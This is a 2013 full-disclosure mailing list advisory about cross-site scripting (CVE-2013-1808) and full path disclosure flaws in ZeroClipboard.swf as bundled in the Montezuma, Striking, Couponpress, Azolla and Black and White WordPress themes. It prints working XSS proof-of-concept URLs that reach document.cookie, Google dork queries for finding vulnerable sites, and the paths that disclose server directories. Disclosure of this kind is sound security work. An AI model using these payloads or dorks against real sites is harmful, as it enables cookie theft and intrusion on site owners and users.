Date: Tue, 9 Apr 2013 01:46:33 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: XSS and FPD vulnerabilities in ZeroClipboard in
	multiple themes for WordPress

Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in
multiple themes for WordPress (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in
February, I've published last month two new advisories (which I prepared in
February). About vulnerabilities in WP plugins and in WP themes (with
ZeroClipboard.swf).

This flash-file is used in hundreds of themes for WordPress (including
custom themes for different sites). Among them are Montezuma, Striking,
Couponpress, Azolla, Black and White. And there are many other vulnerable
themes for WP with ZeroClipboard.swf. Also there is one theme which also
contains ZeroClipboard10.swf.

SecurityVulns ID: 12910
CVE: CVE-2013-1808

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications (WordPress themes) with
ZeroClipboard:

All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.

Both XSS vulnerabilities in ZeroClipboard are fixed in the last version
ZeroClipboard 1.1.7. All developers should update swf-file in their
software. I wrote about developers who begun fixing these vulnerabilities in
ZeroClipboard in their software
(http://seclists.org/fulldisclosure/2013/Mar/207).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described
in previous advisory).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is very widespread flash-file (both versions), as you can find out via
Google dorks. If at searching by standard Goolge dork it's possible to find
tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then
at searching for themes for WordPress it's possible to find hundreds
thousand of sites with these flash-files.

inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in
February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now
more)

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and
others), which is typically for WP themes.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

------------
Timeline:
------------

2013.02.19 - after contacting with old and new developers of ZeroClipboard,
I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about
vulnerabilities in different web applications with ZeroClipboard to draw
more attention to this issue concerned with hundreds of web applications.
2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at
my site (http://websecurity.com.ua/6401/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site